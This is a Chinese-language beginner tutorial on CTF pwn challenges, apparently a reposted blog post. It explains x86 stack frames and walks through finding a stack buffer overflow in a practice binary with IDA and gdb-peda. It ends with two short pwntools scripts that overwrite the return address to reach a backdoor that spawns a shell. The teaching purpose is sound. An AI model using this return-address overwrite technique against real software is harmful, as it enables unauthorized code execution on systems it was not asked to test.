CTF-Pwn入门及栈溢出原理解释

”Pwn”是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介,而我个人理解的话,应该就是向目标发送特定的数据,使得其执行本来不会执行的代码,前段时间爆发的永恒之蓝等病毒其实也算得上是pwn的一种。

1. 准备阶段

这里介绍一些在接下来的教程中用到的工具

ida——交互式反汇编器专业版(Interactive Disassembler Professional),人们常称其为IDA Pro,或简称为IDA。是目前最棒的一个静态反编译软件

peda——PEDA是Long Le在Blackhat2012黑帽会议中放出的Python脚本工具,它可以辅助黑客编写EXP,可以运行在Unix/linux系统上。

gdb——UNIX及UNIX-like下的调试工具

pwntools——pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。

这些软件的安装教程都可以在百度或者谷歌搜索得到,这里就不一一介绍了

2. 初步分析

点击此处下载例子

首先我们用ida打开这个文件

在左边的列表找到main函数,双击,

可以看到main函数的内容

CTF-Pwn入门及栈溢出原理解释_第1张图片

然后点击右边的汇编代码,按下Tab或者F5,可以看到汇编代码翻译成了c语言


CTF-Pwn入门及栈溢出原理解释_第2张图片

再双击vulnerable_function


CTF-Pwn入门及栈溢出原理解释_第3张图片

可以看到,这个函数非常简单,只是单纯的读取一串字符,然后储存到buf里面

但是

开辟的缓存区只有0x48个字节大小,但是read最多可以读取0x100个字节,这样就会造成缓存区溢出。

那知道了有缓存区溢出,我们究竟要怎么利用呢?

不用着急,接下来我会详细的介绍如何利用。

3.原理解释

首先,我们引入栈帧的概念。(知道栈帧的可以跳过这一部分)

平时,我们写c / c++ 代码的时候经常会用到函数,那究竟函数在底层如何实现呢?

就拿我们上面那个文件来说,在main函数那里,调用了vulnerable_function

在汇编代码下面是这样的


那么call 这个指令做了什么呢?

具体是

(1)将当前的EIP压入栈中(EIP寄存器存放下一个CPU指令存放的内存地址)

(2)转移

还没执行call 时程序的内存如下图


CTF-Pwn入门及栈溢出原理解释_第4张图片

esp:寄存器存放当前线程的栈顶指针

ebp:寄存器存放当前线程的栈底指针

执行call之后的内存如下图


CTF-Pwn入门及栈溢出原理解释_第5张图片

这里的0x0000067A是call    vulnerable_function的下一条指令储存的位置

然后下一步就是执行vulnerable_function里面的内容

首先是

push ebp,把main函数的栈底指针压入栈

然后

mov ebp,esp ,  把esp的内容传送到ebp那里 (实在不知道怎么描述。。。)

push    ebx  ,把ebx压入栈

sub    esp, 44h  ,把esp减去0x44,实际上是开辟缓存区

call    __x86_get_pc_thunk_ax

add    eax, 19D9h   这两个指令暂时先无视

sub    esp, 4 和上面一样

执行完这些命令后,内存如下图


CTF-Pwn入门及栈溢出原理解释_第6张图片

假设程序正常运行,执行到


还记得上面函数开始的时候那几个压栈操作吗,这里就是把东西从栈中还原

mov    ebx, [ebp+var_4] 这句就不解释了,很简单

leave ,这个指令等价于 mov esp,ebp ,pop esp,

执行到这里再看一下内存


CTF-Pwn入门及栈溢出原理解释_第7张图片

然后下一条指令就是ret,等价于pop eip,也就是执行完pop eip之后,下一步就是执行0x0000067F处的代码

最后返回main函数之后就变成

CTF-Pwn入门及栈溢出原理解释_第8张图片

跟call vulnerable_function之前的内存状态一模一样

这里为了避免误会,特地说一下,图上的main函数还有vulnerable_function的栈帧其实也算是栈的一部分!!!

4.实战开始

解释完函数的调用过程之后,我们回到正题

在ida左边的函数列表中,我们可以找到


CTF-Pwn入门及栈溢出原理解释_第9张图片

一个后门函数,会执行system("/bin/sh");

这个函数的开始地址为0x00005F0

我们的目的就是利用栈溢出,控制程序运行这一个函数

接下来跟着我一步一步做

首先把程序放到linux下面,然后打开控制台,输入gdb ./tutorial1 (或者gdb  tutorial1的位置)

这里默认已经安装好了准备阶段所说的插件或者软件

然后输入pattern_create 150

会显示类似下图


然后把除了开头和结尾的引号的所有内容复制

然后输入 r,把刚才复制的内容粘贴进去


再回车

然后就会变成类似下图的状况


CTF-Pwn入门及栈溢出原理解释_第10张图片

这个时候你一定很想吐槽,这里的Program received signal SIGSEGV (fault address 0x41344141) 又是什么鬼,(手动黑人问号??)

还记得我们上面原理解释所说的东西吗,这里的栈溢出其实就是把保存在栈中的 ebp ,ebx ,0x0000067F 全部给覆盖掉,可以拉上一点,看一下寄存器的东西


EBP变成我们输入的内容了,而这里的0x41344141其实就是覆盖掉了0x0000067F,代码指示说执行0x41344141处的代码,但是系统说臣妾做不到啊,0x41344141不知道什么鬼东西啊,我执行不下去啊,于是就发出哀号,然后我们就看到Program received signal SIGSEGV (fault address 0x41344141)了,这个时候,我们就相当于用输入的东西,控制了程序。

这时候在控制台输入pattern_offset 0x41344141


这样,我们就可以快速得知,esp到保存0x0000067F的地方一共有76个字节,所以我们只要输入76个任意东西,再加上后门的地址,就可以控制程序执行后门函数

新建一个python代码文件,输入下面的代码,#后面的东西只是注释,可以不输入

from pwn import *

p=process('./tutorial1') #打开本地程序

ret_addr=0x800005F0  #后门地址,这里地址跟上文有些不同,因为在ida中的地址和实际运行的地址有稍微一些差别

payload='a'*76+p32(ret_addr)  #76个a再加上后门地址

p.sendline(payload)   #发送payload

p.interactive()   #开启交互模式

p.close()        #关闭

运行这个python代码,就可以看到出现了$号,输入ls等命令也能成功执行,一般的题目都会在本地放一个flag文件,cat flag.txt之后就可以得到flag

---------------------------------------------------我是分界线---------------------------------------------------------------------------------------------------------------

上面的附件可能有点问题,在本地的话后门地址应该会不同,导致利用失败

http://pan.baidu.com/s/1bQUoGI

这个附件应该是可以正常pwn掉的,python代码大体还是一致的,只是改了下文件名,后台地址,还有缓冲区长度

from pwn import *

p=process('./overflow_tmp')

back_addr=0x804846B

payload='a'*52+p32(back_addr)

p.sendline(payload)

p.interactive()

p.close()


整个教程到这里的结束了,如有不妥之处请指正,谢谢

你可能感兴趣的:(CTF-Pwn入门及栈溢出原理解释)